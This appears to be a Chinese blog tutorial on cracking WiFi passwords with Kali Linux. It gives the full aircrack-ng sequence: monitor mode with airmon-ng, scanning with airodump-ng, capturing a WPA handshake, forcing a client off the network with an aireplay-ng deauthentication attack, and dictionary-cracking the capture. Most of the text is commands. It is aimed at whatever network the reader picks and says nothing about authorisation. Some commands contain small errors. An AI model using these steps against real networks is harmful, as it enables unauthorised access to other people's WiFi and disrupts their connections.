kali下wifi破解密码教程
首先电脑插入USB无线网卡
文章图片
wuxianwangka.jpg 【kali下wifi破解密码教程】然后通过VMware里面 虚拟机 > 可移动设备 选择我们的无线网卡连接,如下图:
文章图片
0.png step1: 查看网卡有没有加载进来
root@kali:~# iwconfig
注:iwconfig是查看无线网卡,ifconfig 是查看有线网卡
文章图片
1.png step2: 开启无线网卡的侦听功能
root@kali:~# airmon-ng start wlan0
文章图片
2.png 此时需要再次查看下网卡:
文章图片
图片.png step3:侦听附近的wifi信号
root@kali:~# airodump-ng wlan0mon
文章图片
33.png
文章图片
3.png 如果出现无法侦听数据,重启一下服务,命令如下:
root@kali:~# airmon-ng check kill
step4: 选择你要破解的无线网络(ssid),抓取握手包
root@kali:~# airodump -c 1 --bssid B0:E1:7E:7D:EA:CC-w secevery wlan0mon
文章图片
4-1.png
文章图片
4-2.png 此时如果有人连接这个wifi,就会产生握手包,我们就会抓到这个握手包,但是运气并不是那么好,如上图所示一直没有抓到握手包,因此我们就要手动的踢掉一个人的wifi,这样它就会再次自动连接wifi,产生一个握手吧,这样我们就抓到了握手包。具体来看下一步:
step5:抓不到握手报文,需要模拟station,进行攻击 # aireplay-ng -0 10 -a bssid -c station mac wlan0mon
# aireplay-ng -0 10 -a AP的mac地址 -c 你要踢掉的主机的mac地址 wlan0mon
root@kali:~# aireplay-ng -0 10 -a B0:E1:7E:7D:EA:CC -c B0:E1:7E:7D:EA:CC wlan0mon
文章图片
5.png 此时我们再去看刚才侦听握手包的窗口,发现已经抓到了握手包,如下图所示
文章图片
55.png 然后查看一下当前目录下抓到的握手包secevery-01.cap
文章图片
555.png step6:破解报文,获得密码。 使用字典passwd.txt
root@kali:~# aircrack-ng -a2 -b B0:E1:7E:7D:EA:CC -w passwd.txt secevery-01.cap
文章图片
6.png
推荐阅读
- 开学第一天(下)
- 【故障公告】周五下午的一次突发故障
- 生活随笔|好天气下的意外之喜
- MongoDB,Wondows下免安装版|MongoDB,Wondows下免安装版 (简化版操作)
- 汇讲-勇于突破
- Android中的AES加密-下
- 说的真好
- 放下心中的偶像包袱吧
- Linux下面如何查看tomcat已经使用多少线程
- 【1057快报】深入机关,走下田间,交通普法,共创文明